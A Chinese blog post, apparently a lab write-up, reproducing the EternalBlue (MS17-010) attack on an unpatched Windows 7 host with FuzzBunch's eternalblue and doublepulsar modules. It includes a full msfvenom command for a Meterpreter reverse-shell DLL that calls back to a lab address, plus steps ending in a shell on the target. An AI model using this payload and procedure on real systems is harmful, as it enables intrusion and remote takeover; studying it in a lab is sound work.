1. 程式人生 > >永恒之藍漏洞利用復現

永恒之藍漏洞利用復現

成功 .cn 旗艦 nal blue ima 選擇執行 win 環境搭建

一、環境搭建:

IP地址 系統信息 備註 角色
192.168.0.244 win7旗艦版(未安裝MS17-010補丁版本) 需開啟445端口及SMB協議 靶機
192.168.0.105 win7旗艦版 需安裝python2.6.6&pywin32 攻擊機
192.168.0.245 kali linux 2.0 生成reverse shell的dll文件 輔助機

二、攻擊流程:

  攻擊流程圖解:

  技術分享

  1.在kali linux中利用metasploit生成用於建立反向鏈接的dll文件

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > reverse.dll

  2.打開metasploit

  技術分享

  3.建立監聽

  技術分享

  4.在Windows 7下,運行fb.py工具

  技術分享

  5.指定攻擊目標

  技術分享

  6.指定攻擊目標後,輸入:use eternalblue,使用永恒之藍漏洞

  7.一路確認輸入的信息,知道選擇攻擊工具,選擇fb模塊

  技術分享

  8.再次確認攻擊目標,之後輸入:use doublepulsar

  9.選擇要攻擊的服務

  技術分享

  10.一路按確定鍵,直到進入選擇執行動作這一步驟

  技術分享

  11.在選擇攻擊動作之前將步驟1中生成的reverse.dll文件放置在攻擊機的c盤下

  12.選擇2,將步驟1中生成的reverse.dll文件註入到靶機

  13.成功註入

  技術分享

  此時,攻擊機獲得靶機根權限,可以在攻擊機上執行靶機的shell 命令,查看靶機文件。

永恒之藍漏洞利用復現